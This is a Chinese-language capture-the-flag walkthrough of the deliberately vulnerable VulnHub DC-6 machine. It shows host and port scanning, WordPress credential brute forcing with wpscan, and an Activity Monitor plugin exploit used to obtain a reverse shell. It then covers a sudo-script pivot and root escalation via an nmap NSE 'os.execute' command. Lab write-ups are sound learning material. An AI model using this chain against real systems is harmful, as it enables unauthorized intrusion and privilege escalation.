简介
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207011940212.png)
下载
- DC-6.zip (Size: 619 MB)
- Download: http://www.five86.com/downloads/DC-6.zip
- Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip
- Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( Magnet)
信息收集
主机探活
kali中使用arp-scan进行主机探活
arp-scan --interface eth0 192.168.0.0/24
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207011944963.png)
经过筛选可以知道192.168.0.141是DC-6的ip
端口扫描
nmap -sC -sV -p- 192.168.0.141
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207011944210.png)
发现这里只是开了80、22端口
首先从80端口入手
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207011945278.png)
这和之前DC-2是一样的
返回一个错误页面,F12可以看到网页做了一个301永久重定向
修改hosts文件
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207011947371.png)
再次打开正常显示
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207011948965.png)
这里可以看出这又是一个wordpress的页面
然后页面显示的信息跟插件有关
这个题目在官网中还给了线索
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207011954519.png)
CLUE
好吧,这并不是一个真正的线索,但对于那些只想继续工作的人来说,更多的是一些“我们不想花五年时间等待某个过程完成”的建议。
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 这应该可以为您节省几年时间。 😉
这个线索之后有用的
然后我们还是常规先获取一下用户名
wpscan --url http://wordy/ -e u
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041723147.png)
能够得到以上用户
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041724290.png)
然后密码的话就要用到之前官网上给到的提示了
根据提示我们可以得到密码表
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041726142.png)
然后通过用户名表和密码表爆破后台账号
wpscan --url http://wordy/ -U username.txt -P passwords.txt
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041731822.png)
找到用户名和密码
登录后台
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041736089.png)
登录成功,但是其他地方都没有发现有什么问题,但是这个使用了一个插件Activity monitor
渗透
使用msf搜索这个插件
searchsploit activity monitor
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041741695.png)
这里我们使用第三个
cp /usr/share/exploitdb/exploits/php/webapps/45274.html .
这里我们需要修改的是请求地址和反弹shell的地址
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041744197.png)
然后python开启http服务并且还要监听9999端口
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041745572.png)
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041746852.png)
然后访问127.0.0.1
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041747210.png)
点击请求
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041748573.png)
反弹shell成功
然后用python转换成标准的shell
python -c "import pty;pty.spawn('/bin/bash')"
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041750112.png)
然后在home目录下可以看到四个用户
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041752362.png)
然后在mark的stuff目录下找到了一个things-to-do.txt文件
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041755068.png)
这里有graham的密码
我们ssh登录graham
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041756047.png)
查看当前用户可以执行的操作,发现可以运行jens用户下面的backups.sh
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041759891.png)
查看backups.sh文件,发现是对web的文件进行打包备份
向backups.sh文件中写入”/bin/bash”,并以jens用户去执行该脚本
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041803781.png)
脚本执行完成后,可以发现切换到jens用户了
提权
再次查看jens可以执行的操作,发现jens可以在无密码情况下使用nmap命令
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041804316.png)
这里其实也还有个提示
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041808735.png)
写入一条命令到getShell,通过nmap运行getShell成功进入root用户
echo 'os.execute("/bin/sh")' > getShell
sudo nmap --script=getShell
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041810146.png)
提权成功
cd ~
cat theflag.txt
![](https://cdn.jsdelivr.net/gh/Townmacro/image/img/202207041812922.png)